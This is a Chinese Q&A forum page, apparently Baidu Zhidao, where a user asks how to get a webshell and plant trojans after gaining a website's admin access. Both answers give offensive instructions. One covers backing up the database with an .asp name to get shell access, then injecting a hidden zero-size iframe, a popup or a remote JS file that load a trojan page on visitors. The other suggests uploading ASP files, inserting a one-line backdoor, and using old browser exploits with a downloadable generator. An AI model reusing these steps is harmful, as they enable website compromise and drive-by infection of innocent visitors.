急!!进入后台怎么拿WEBSHELL
进入后台拿到管理后怎么进行放木马??步骤是什么???有谁可以教一下怎么做木马网页???谢谢谢谢.........
进入后台拿到管理后怎么进行放木马??步骤是什么???有谁可以教一下怎么做木马网页???谢谢 谢谢......
展开
展开全部
去备份数据库,数据库的名称一定要是什么什么.asp后缀.之后得到一个备份好的绝对网址,假如网站网址是www.xxx.com/main/manage/login.asp
备份后的数据库是D:\aaa\bbb\ccc\main\什么什么.asp
那么就可以用www.xxx.com/main/什么什么.asp访问它的数据库,找到首页,修改下代码,
你可以用如下代码进行挂马.
<html>
<iframe src="网马地址" width="0" height="0" frameborder="0"></iframe>
</html>
或者
<SCRIPT language=javascript>
window.open("网马地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=1,height=1");
</script>
或者
写一个JS文件
JS文件:
document.write("<iframe width='0' height='0' src='网马地址></iframe>");
再在首页调用JS文件:
<script language="javascript" src="http://xxxxxxx.net/文件名.js"></script>
备份后的数据库是D:\aaa\bbb\ccc\main\什么什么.asp
那么就可以用www.xxx.com/main/什么什么.asp访问它的数据库,找到首页,修改下代码,
你可以用如下代码进行挂马.
<html>
<iframe src="网马地址" width="0" height="0" frameborder="0"></iframe>
</html>
或者
<SCRIPT language=javascript>
window.open("网马地址","","toolbar=no,location=no,directories=no,status=no,menubar=no,scrollbars=no,width=1,height=1");
</script>
或者
写一个JS文件
JS文件:
document.write("<iframe width='0' height='0' src='网马地址></iframe>");
再在首页调用JS文件:
<script language="javascript" src="http://xxxxxxx.net/文件名.js"></script>
本回答由提问者推荐
已赞过
已踩过<
评论
收起
你对这个回答的评价是?
展开全部
不是所有的都可以拿到shell的。
1。看看有没有上传页面。抓包下来手工提交个asp上去看看可以不。
2。如果是access站。在添加新闻之类地方直接插一句话看看。
3。网页木马,现在大多是06014和07004的漏洞。国内06014补的少。用这个好了。07004比较头痛。溢出形的成功率不高。不过老美补丁打的多。07004在美国成功率比较高。77169.com有下生成器。你自己去下吧。
1。看看有没有上传页面。抓包下来手工提交个asp上去看看可以不。
2。如果是access站。在添加新闻之类地方直接插一句话看看。
3。网页木马,现在大多是06014和07004的漏洞。国内06014补的少。用这个好了。07004比较头痛。溢出形的成功率不高。不过老美补丁打的多。07004在美国成功率比较高。77169.com有下生成器。你自己去下吧。
已赞过
已踩过<
评论
收起
你对这个回答的评价是?
推荐律师服务:
若未解决您的问题,请您详细描述您的问题,通过百度律临进行免费专业咨询
